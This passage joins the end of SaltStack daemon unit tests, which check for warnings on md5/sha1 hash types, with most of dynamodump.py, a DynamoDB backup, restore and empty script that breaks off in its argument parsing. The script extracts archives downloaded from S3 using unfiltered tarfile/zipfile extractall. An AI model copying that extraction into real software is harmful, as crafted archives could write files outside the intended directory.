obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['start_log_info', 'prepare', 'shutdown']:
setattr(obj, attr, MagicMock())
setattr(obj, 'minion', MagicMock(restart=False))
return obj
ret = True
_logger = LoggerMock()
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_minion().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_minion().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
def test_proxy_minion_daemon_hash_type_verified(self):
'''
Verify if ProxyMinion is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_proxy_minion():
'''
Create proxy minion instance
:return:
'''
obj = daemons.ProxyMinion()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['minion', 'start_log_info', 'prepare', 'shutdown', 'tune_in']:
setattr(obj, attr, MagicMock())
obj.minion.restart = False
return obj
ret = True
_logger = LoggerMock()
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_proxy_minion().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_proxy_minion().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
def test_syndic_daemon_hash_type_verified(self):
'''
Verify if Syndic is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_syndic():
'''
Create syndic instance
:return:
'''
obj = daemons.Syndic()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['syndic', 'start_log_info', 'prepare', 'shutdown']:
setattr(obj, attr, MagicMock())
return obj
ret = True
_logger = LoggerMock()
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_syndic().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_syndic().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
if __name__ == '__main__':
from integration import run_tests
run_tests(DaemonsStarterTestCase, needs_daemon=False)
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with DynamoDB Local).
"""
import argparse
import boto3
import datetime
import errno
import fnmatch
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from queue import Queue
from six.moves import input
from urllib.error import URLError, HTTPError
from urllib.request import urlopen
AWS_SLEEP_INTERVAL = 10 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
DATA_DIR = "data"
DATA_DUMP = "dump"
BILLING_MODE = "PROVISIONNED"
DEFAULT_PREFIX_SEPARATOR = "-"
CURRENT_WORKING_DIR = os.getcwd()
JSON_INDENT = 2
LOCAL_REGION = "local"
LOCAL_SLEEP_INTERVAL = 1 # seconds
LOG_LEVEL = "INFO"
MAX_BATCH_WRITE = 25 # DynamoDB limit
MAX_NUMBER_BACKUP_WORKERS = 25
MAX_RETRY = 6
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
RESTORE_WRITE_CAPACITY = 25
RESTORE_READ_CAPACITY = 25
SCHEMA_FILE = "schema.json"
THREAD_START_DELAY = 1 # seconds
json.JSONEncoder.default = lambda self, obj: (
obj.isoformat() if isinstance(obj, datetime.datetime) else None
)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = (
urlopen(
METADATA_URL + "placement/availability-zone", data=None, timeout=5
)
.read()
.decode()
)
aws_region = azone[:-1]
except HTTPError as e:
logging.exception(
"Error determining region used for AWS client. Typo in code?\n\n"
+ str(e)
)
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(
service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile=profile, region=region, service="sts")
dynamo = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(
region, account_number, table
)
table_tags = dynamo.list_tags_of_resource(ResourceArn=table_arn)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(
bucket_object,
bucket,
bucket_object,
ExtraArgs={"ServerSideEncryption": "AES256"},
)
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(Bucket=bucket)
except s3.exceptions.ClientError as e:
logging.exception(
"S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e)
)
sys.exit(1)
try:
contents = s3.list_objects_v2(Bucket=bucket, Prefix=args.dumpPath)
except s3.exceptions.ClientError as e:
logging.exception(
"Issue listing contents of bucket " + bucket + "\n\n" + str(e)
)
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception(
"Unable to find file to restore from. "
"Confirm the name of the table you're restoring."
)
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception(
"compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e)
)
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception(
"Zip file would be too large. Update code to use Zip64 to continue."
)
sys.exit(1)
else:
logging.error(
"Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file"
)
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args["ExclusiveStartTableName"] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info(
'Cannot find "./%s", Now trying user provided absolute dump path..'
% args.dumpPath
)
try:
dir_list = os.listdir(args.dumpPath)
except OSError:
logging.info(
'Cannot find "%s", Now trying current working directory..'
% args.dumpPath
)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info(
'Cannot find "%s" directory containing dump files!' % dump_data_path
)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(
re.sub(
r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]
).split()[0]
):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(
r"([A-Z])", r" \1", source_table_name
).split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
if not args.noConfirm:
confirmation = input(
"About to delete table {}. Type 'yes' to continue: ".format(table_name)
)
if confirmation != "yes":
logging.warn("Confirmation not received. Stopping.")
sys.exit(1)
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying deletion of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying deletion of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info(
"Waiting for "
+ table_name
+ " table to be deleted.. ["
+ conn.describe_table(table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(
str(len(unprocessed_items))
+ " unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY))
)
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info(
"Max retries reached, failed to processed batch write: "
+ json.dumps(unprocessed_items, indent=JSON_INDENT)
)
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if (
conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
!= "ACTIVE"
):
logging.info(
"Waiting for "
+ table_name
+ " table to be "
+ verb
+ ".. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(
conn, table_name, read_capacity, write_capacity, wait=True
):
"""
Update provisioned throughput on the table to provided values
"""
logging.info(
"Updating "
+ table_name
+ " table read capacity to: "
+ str(read_capacity)
+ ", write capacity to: "
+ str(write_capacity)
)
while True:
try:
conn.update_table(
TableName=table_name,
ProvisionedThroughput={
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
},
)
break
except conn.exceptions.ResourceNotFoundException:
logging.info(
"Limit exceeded, retrying updating throughput of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput"
"of " + table_name + ".."
)
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name, billing_mode):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if billing_mode == "PROVISIONED":
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = table_global_secondary_indexes
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying creation of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info(
"Recreation of "
+ table_name
+ " completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"][
"ReadCapacityUnits"
]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"][
"WriteCapacityUnits"
]
# override table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo, table_name, read_capacity, original_write_capacity
)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args["ExclusiveStartKey"] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name, **optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error(
"EXCEEDED THROUGHPUT ON TABLE "
+ table_name
+ ". BACKUP FOR IT IS USELESS."
)
tableQueue.task_done()
f = open(
args.dumpPath
+ os.sep
+ table_name
+ os.sep
+ DATA_DIR
+ os.sep
+ str(i).zfill(4)
+ ".json",
"w+",
)
del scanned_table["ResponseMetadata"]
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False,
)
logging.info(
"Backup for "
+ table_name
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
tableQueue.task_done()
def prepare_provisioned_throughput_for_restore(provisioned_throughput):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
with the provisioned throughput attribute
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"ReadCapacityUnits": provisioned_throughput["ReadCapacityUnits"],
"WriteCapacityUnits": provisioned_throughput["WriteCapacityUnits"],
}
def prepare_gsi_for_restore(gsi):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"IndexName": gsi["IndexName"],
"KeySchema": gsi["KeySchema"],
"Projection": gsi["Projection"],
"ProvisionedThroughput": prepare_provisioned_throughput_for_restore(
gsi["ProvisionedThroughput"]
),
}
def do_restore(
dynamo,
sleep_interval,
source_table,
destination_table,
write_capacity,
billing_mode,
):
"""
Restore table
"""
logging.info(
"Starting restore for " + source_table + " to " + destination_table + ".."
)
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info(
'Cannot find "./%s/%s", Now trying current working directory..'
% (args.dumpPath, source_table)
)
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info(
'Cannot find "%s/%s" directory containing dump files!'
% (CURRENT_WORKING_DIR, source_table)
)
sys.exit(1)
table_data = json.load(
open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE)
)
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
if original_write_capacity == 0:
original_write_capacity = RESTORE_WRITE_CAPACITY
# ensure that read capacity is at least RESTORE_READ_CAPACITY
if original_read_capacity < RESTORE_READ_CAPACITY:
read_capacity = RESTORE_WRITE_CAPACITY
else:
read_capacity = original_read_capacity
if original_read_capacity == 0:
original_read_capacity = RESTORE_READ_CAPACITY
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
original_gsi_read_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
# keeps track of original gsi write capacity units. If provisioned capacity is 0, set to
# RESTORE_WRITE_CAPACITY as fallback given that 0 is not allowed for write capacities
original_gsi_write_capacity = gsi["ProvisionedThroughput"][
"WriteCapacityUnits"
]
if original_gsi_write_capacity == 0:
original_gsi_write_capacity = RESTORE_WRITE_CAPACITY
original_gsi_write_capacities.append(original_gsi_write_capacity)
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# keeps track of original gsi read capacity units. If provisioned capacity is 0, set to
# RESTORE_READ_CAPACITY as fallback given that 0 is not allowed for read capacities
original_gsi_read_capacity = gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
]
if original_gsi_read_capacity == 0:
original_gsi_read_capacity = RESTORE_READ_CAPACITY
original_gsi_read_capacities.append(original_gsi_read_capacity)
if (
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
< RESTORE_READ_CAPACITY
):
gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
] = RESTORE_READ_CAPACITY
# temp provisioned throughput for restore
table_provisioned_throughput = {
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
}
optional_args = {}
if billing_mode == "PROVISIONED":
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if not args.dataOnly:
logging.info(
"Creating "
+ destination_table
+ " table with temp write capacity of "
+ str(write_capacity)
)
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = [
prepare_gsi_for_restore(gsi) for gsi in table_global_secondary_indexes
]
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, "
"retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(
dynamo, destination_table, original_read_capacity, write_capacity, False
)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep
)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path
+ os.sep
+ source_table
+ os.sep
+ DATA_DIR
+ os.sep
+ data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug(
"Writing next "
+ str(MAX_BATCH_WRITE)
+ " items to "
+ destination_table
+ ".."
)
batch_write(
dynamo,
BATCH_WRITE_SLEEP_INTERVAL,
destination_table,
put_requests,
)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(
dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests
)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if (
int(write_capacity) != original_write_capacity
or int(read_capacity) != original_read_capacity
):
update_provisioned_throughput(
dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False,
)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
original_gsi_read_capacity = original_gsi_read_capacities.pop(0)
if (
original_gsi_write_capacity != wcu
or original_gsi_read_capacity != rcu
):
gsi_data.append(
{
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
original_gsi_read_capacity
),
"WriteCapacityUnits": int(
original_gsi_write_capacity
),
},
}
}
)
if gsi_data:
logging.info(
"Updating "
+ destination_table
+ " global secondary indexes write and read capacities as necessary.."
)
while True:
try:
dynamo.update_table(
TableName=destination_table,
GlobalSecondaryIndexUpdates=gsi_data,
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info(
"Restore for "
+ source_table
+ " to "
+ destination_table
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
else:
logging.info(
"Empty schema of "
+ source_table
+ " table created. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(
description="Simple DynamoDB backup/restore/empty."
)
parser.add_argument(
"-a",
"--archive",
help="Type of compressed archive to create." "If unset, don't create archive",
choices=["zip", "tar"],
)
parser.add_argument(
"-b",
"--bucket",
help="S3 bucket in which to store or retrieve backups." "[must already exist]",
)
parser.add_argument(
"-m",
"--mode",
help="Operation to perform",
choices=["backup", "restore", "empty"],
)
parser.add_argument(
"-r",
"--region",
help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '"
+ LOCAL_REGION
+ "' for local DynamoDB testing",
)
parser.add_argument(
"--host", help="Host of local DynamoDB [required only for local]"
)
parser.add_argument(
"--port", help="Port of local DynamoDB [required only for local]"
)
parser.add_argument(
"--accessKey", help="Access key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"--secretKey", help="Secret key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"-p",
"--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication",
)
parser.add_argument(
"-s",
"--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag",
)
parser.add_argument(
"-d",
"--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]",
)
parser.add_argument(
"--prefixSeparator",
help="Specify a different prefix separator, " "e.g. '.' [optional]",
)
parser.add_argument(
"--noSeparator",
action="store_true",
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]",
)
parser.add_argument(
"--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]",
)
parser.add_argument(
"-t",
"--tag",
help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE",
)
parser.add_argument(
"--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]",
)
parser.add_argument(
"--schemaOnly",
action="store_true",
default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]",
)
parser.add_argument(
"--dataOnly",
action="store_true",
default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]",
)
parser.add_argument(
"--noConfirm",
action="store_true",
default=False,
help="Don't ask for confirmation before deleting existing schemas.",
)
parser.add_argument(
"--skipThroughputUpdate",
